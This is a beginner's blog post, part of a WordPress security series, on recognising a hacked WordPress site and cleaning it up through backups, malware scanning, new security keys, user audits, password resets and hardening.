More often than not, I get to read about certain data loss horror story from WordPress users. “I was about to publish an article when my website crashed — I was unable to log in! Now I can’t get my data back no matter how hard I try!” Or, more relevant to the WordPress, “I was scrolling through my site logs where I noticed an unusual traffic spike or an overwhelming amount of spam content." These are the pretty obvious signs of a hacked website, and something needs to be done about it.
Sometimes people report spam links being added to their content without their consent. If you ever face any such signs, that would mean your site was hacked, and you need to fix it. That’s what this post is about. I am going to talk about certain steps that you can take to fix a hacked site. Let’s get started.
Hacking Is So Mainstream
The concept of hacking is not something new. How many of you have ever password-protected a computer to restrict young siblings from using it? And, how many of you have guessed the password and successfully plunged into the same old computer that you have completely forgotten about? I assume the answer to both these questions is: "Probably on more than one occasion." Right?
This is somewhat a minor form of hacking though it lacks the purpose of harming anyone.
More Benefit in Staying Hidden
Gone are the days when hacking was only about getting and modifying login credentials. Earlier, if you failed to log in to your online account you assumed to be hacked. Today hackers, however, stay somewhat patient and begin with first infecting a site and then spread that malware to users and to even to other servers. There’s less benefit to them if the person being hacked knows they’re hacked.
That’s why hackers try to stay hidden and even if it is about cracking passwords, they instigate a core malicious dump of data, in which vast swathes of data are dumped into a file, which could do more harm than ever. All, I am trying to say here, is that having hacked a site is not the prime goal of hackers anymore.
They build automated scripts, which help them hack a number of servers, users, sites, at the same time then they chose to stay hidden as long as they can, to harvest as much value as they can. I'm sure no one would ever want to be in this boat. That’s what we gotta fix it.
Things to Know Before Getting Started
It still scares me to death whenever I am notified about any malicious activity on any of my sites, through an email. What most of the users do in such situations is to contact their web hosts. But, web hosts rarely offer the kind of support which they need and expect during such conditions.
Don't think of me as a nagging customer who is not satisfied from his hosting provider and is looking for a new web host. What I mean here is that you cannot always rely on your host for protecting your websites, especially the one which has other priorities as a business i.e. hosting. In-house efforts are to be made as well.
It’s disheartening to become a victim to any hacking. It affects your business both monetarily and socially. Hacking is not only about losing a website. You lose your data, visitors, rankings, and even trust.
Imagine you run an online store bearing a database of more than 10,000 customers. This means that if not all then the least you should protect for every customer is his credit card details. If such a website gets hacked, then you are doomed. It has many far reaching effects than one could imagine. But if the same hacking attempt is made on a regular blog with monthly 10,000 page views then the site owner has somewhat little to lose. But this is no way to justify the act of hacking a website. An ordinary blog is equally important as an eCommerce site.
Hacking is Curable
Over the past few years, several thousands of WordPress sites were hacked. But how many of these actually recovered from it? I know of many users who have recovered their hacked WordPress sites. That’s good to know. If you are hacked, you can still get recovered.
But, still many beginners prefer deleting the entire website instead of fixing it on the account that they are too naive to handle this technical mumbo jumbo. Thus, they opt for an easy escape which is severely off-putting for me. So, the first thing you need to realize is:
If you are running WordPress and you have been hacked, Don’t Panic. It can be fixed!
This is a complete beginner's guide in which you are going to learn about fixing a WordPress site if it has been hacked and infected with malicious code, spam, backdoors, malware or other vulnerabilities.
I will describe robust tools which not only clean your website but also restore it effectively. The guide is a culmination of the entire techniques which I have mentioned throughout this WordPress security series. So, do take a look at other articles of this series as well. Let's begin!
Is Your Website Really Being Hacked?
For someone who is running a small business or even a simple blog will find themselves wondering, “Why me?” “Why on earth would any hacker want to spend their valuable time trying to hack my website?” Turns out that there are various reasons for it. Mostly, because hackers these days hack any site with known vulnerabilities and do it in the form of a bulk hack with automated scripts and scrapers.
It is very important to ensure that your website is hacked. Panicking over stuff like spam comments, repetitive login attempts, etc. may put you in a lot of hassle. Despite all the smart moves, it isn’t that hard to find whether your site is hacked or not. Here are the few symptoms through which you can tell that a WordPress site was hacked.
Your site has been hacked if:
- Spam content appears in the site header and footer which redirects users to things like illegal services, bad neighborhood websites, drugs, etc.
- Your site visitors complain about getting spam content. This is an even more severe case, where your users are being targetted directly.
- When your web host prompts about a malicious activity e.g. spam emails with links to your website.
- Core files modifications are observed. The files like .htaccess normally contain the modified code. This is only possible to detect if you’re a developer or if you know what you are looking for.
- You get blacklist warnings by Google, Bing, McAfee, etc.
- You detect new site visitors from unusual parts of the world. E.g. if your normal site visitors are from the US, and you suddenly get a lot of visitors from the African part of the globe. It means something suspicious is happening.
- You are unable to login your WordPress account.
All these symptoms point to one common conclusion i.e. your site has been hacked or is about to get hacked. It can take quite a bit of time to clean up the mess that may have been there long before you discovered it. So, let's discuss in a step by step approach on how to fix your hacked WordPress site.
Identify the Nature of Hack
Security should be a top priority, and if your website is hacked, it must be handled with great patience. First of all, you must identify the extent to which the hacking attempt has been made. Sometimes a hacker has only managed to breach the initial layers of security or might have gone too far to get complete control of your site.
So, examining the situation at hand is fundamentally important. Doing this will let you fix the hack by moving in a right direction. You must try logging in your WordPress admin panel, check for the presence of any spam links, check Google's marking for an insecure website, etc.
If you can still log in your account, then an immediate action would be changing the username and password. You should also consider updating your Salts.
This would put a stop to any further malicious activity. However, if severe damage has been caused then preventive steps should be taken accordingly which I intend to explain shortly.
You Need Professional Assistance
Trust me when I say that hackers are evil geniuses who inject malicious code which is hidden at various locations. So, if you aren't a code nerd, then things can get pretty complicated pretty quickly. You cannot find this obscured code and in this case, I would never recommend toying around with the PHP files on your own. It's always wise for beginners to seek help from a professional.
The WordPress community is filled with security experts and solution providers who fix hacked websites. They offer their services at quite nominal charges which a beginner can easily afford. However, if you are looking for the prominent names for this deal, then Sucuri Security leads the race. They clean and repair hacked websites. So, if you are not tech-savvy or want to stay at peace, then Sucuri can be trusted without any doubt.
Onboard Your Web Host
Onboarding a secure web host is the first step towards site security. Almost every hosting company claims to offer the best server administration, price, and add-ons but ultimately fails if their services aren't safe to use. Hackers often schedule a job in the background to re-infect the website. An effective hosting will detect all these unusual jobs.
Just scroll through the CRON jobs on your server or in your hosting environment and check that nothing is scheduled about which you are unaware of. This is a precautionary measure which prevents any hacking attempt. Prominent hosting providers offer the option of a CRON scheduler in cPanel from where you can periodically check to make sure nothing has been altered.
Similarly, a good hosting will always extend its support in wake of a hacking attempt. Not only this, they also notify about a malicious activity well in time and might clean up the hack for you on their own.
But if your website is hacked, then you should contact your web host immediately and follow their instructions. Onboard them to the problems you are facing, that is your host should be informed at the earliest. They have a complete team of experts and professionals who can help you with both the basic and additional information about the hack. E.g. how much damage is caused? what was the reason behind the hack? where is the backdoor hiding? etc.
Most of the hacks can easily be dealt with by restoring an old backup which didn’t have the malware and fixing the issue through which you got hacked in the first place.
By now, I am sure you know the importance of having backups for your sites. Backups solve a good deal of your problems if something goes wonky during an update or your if your site gets hacked. Just restore a backup.
Backups function as a site insurance. Without any stress, you can restore a site and get back to its normal working. Having a good backup strategy is of core importance. There are a couple of go-to backup plugins which I’ve already discussed in my previous article.
You can schedule backups and keep a copy of it on the server or ship it off to an external destination e.g. Amazon S3, DropBox, Google Drive, FTP, and email. Likewise, your backup solution should run automatically at a frequency that suits the needs of your website.
While choosing a backup solution make sure it does not exclude certain file types such as videos and archives. Since its launch, I’ve been an advocate of ManageWP Orion which caters the need of taking backups quite well.
Malware Scanning and Removal
A hacked website is never fixed if there exists a tiny miny malware or loophole that you didn’t remove. A complete cleansing of a website can only be ensured if it is scanned properly for the presence of any security threat. Scanning of a hacked WordPress site begins with the removal of inactive or useless themes and plugins because this is the most favorite hideout for backdoors. Once you're done with this step, jump to the next level of scanning.
Obviously, you cannot check every component of a website. So, manual scanning is an absurd idea. From my experience, I'll recommend the Sucuri Security Scanner. They offer top notch scanning services for your hacked website. They check your site against a database of known problems to determine if it has been hacked. Then they run a complete analysis during which they look for viruses, spam, redirects and several other items to make sure that your site is fixed and safe to use.
Initially, they offer a free manual scan after which you can subscribe to their paid service as well. Apart from this, there are several free scanning plugins as well. I also recommend reading my article about Scanning Your WordPress Websites for Security Vulnerabilities.
Edit Your Security Keys and Salts
The inclusion of WordPress security keys and salts after version 3.1 offered a new trick to protect sites from brute force attacks. Likewise, the idea of changing the keys regularly can fix several hacked websites. If you have implemented all the solutions listed above, a hacker who has your login credentials still possesses the control of your site. How? Because of the cookies which are valid and, they can remain logged in.
The only way of getting rid of this problem is to modify and update your keys and salts. You can generate a new set of WordPress keys and add them to your wp-config.php file. I have written a complete article featuring all the important points about keys and salts. Read it here: All You Need to Know About WordPress Security Keys and Salts.
Modifying User Permissions
It is quite often that your website has multiple user accounts with different roles. The chances are that there is more than one administrator account as well. If your site is hacked, you must immediately go to the Users section to check the presence of any new user account which you haven't added recently. If there exists any, remove it quickly.
You can also remove all the other useless user accounts and get started from the scratch. Or change the role of inactive users to “Subscriber” You can add the authorized users once again after the site gets fixed.
Reset Login Credentials
After following all the steps mentioned above, it's time to reset your login credentials once again. By saying so I mean the username and password of every single thing i.e. your dashboard, cPanel, MySQL, FTP, database, etc.
Hackers have developed a whole range of tools to get at your personal data. But a strong password is the main impediment which stands between your information and these infectious hacking tools.
So, reset the login credentials of every single user account. Instead of asking the users, change it yourself and let them know about the new passwords. I have repeatedly been highlighting the importance of strong usernames and passwords in WordPress. You must pay heed to its significance as well.
A more candid approach in this respect will be to reset all the user passwords by using the Sucuri plugin. You find a section for Post-Hack settings from where you can click the Reset User’s Password tab to configure a new password. This sends temporarily created strong passwords to all the authorized users through an email. Pretty handy eh?
Taking a Fresh Start
People say there is always a new beginning, and so is the case with hacked websites as well. Hacking is definitely a nightmare for every site owner but fighting this fear and coming out as a winner is a real deal. Running away and giving up should not be an option for you. If you have managed to fix a hacked website then kudos to you. Trust me you have done a brilliant job. But what's next?
Now this is your testing time. If you are thinking that you can sit back and relax after fixing a hacked site, then sadly you are wrong. You must learn from your mistakes and take a fresh start. You need to make darn sure your site doesn’t get hacked again. For it, you need to take the following preventive measures:
- Keep all your plugins and themes up to date. Make sure you run the recent version of WordPress every time.
- Use a reliable and secure web hosting. Instead of shared hosting, shift to managed WordPress hosting because it is safe to use.
- Use strong and unpredictable passwords.
- Limit the repetitive login attempts by installing a third party plugin.
- Install a reputable security plugin like iThemes Security and configure it properly.
- Block the attacks from reaching to the server by installing a website firewall and monitoring system.
- Run regular scans on your WordPress site.
- Schedule regular backups with plugins like BackupBuddy.
- Get rid of all old WordPress installations lying around on your server.
- Finally, subscribe to a security solution providers which keeps an eye on your site security.
Wrapping Things Up!
The ultimate goal of taking all the WordPress security measures is to protect your website from being hacked. If you are reading this article, then there could be a possibility that your site is never hacked or is hacked, but you are unaware of it. There are several free online tools through which you can easily know your site's vulnerability level. Another handy tool for this purpose is to know whether your site is in the Google's Safe Browsing List.
Visit the Google’s Safe Browsing Status Checker and test your own site address.
The results contain detailed information on the current status of your site, why it is listed on Google’s malware list and what to do next. So, if these show any signs of hacking, then all the techniques mentioned above will be quite helpful for you.
To wrap up all the nitty gritty steps mentioned above to clean a hacked WordPress website you begin with identifying the hack, then removing the malware and finally hardening your site’s security for future. I recommend you consulting with a security geek.
Have you ever been a victim of a hacking attempt? How you encountered that situation? What tools and techniques you used? Share your story with us.
Finally, you can catch all of my articles on my profile page, and you can follow me or reach out at Twitter @mrahmadawais; to discuss this article. As usual, don’t hesitate to leave any questions or comments below, and I’ll aim to respond to each of them.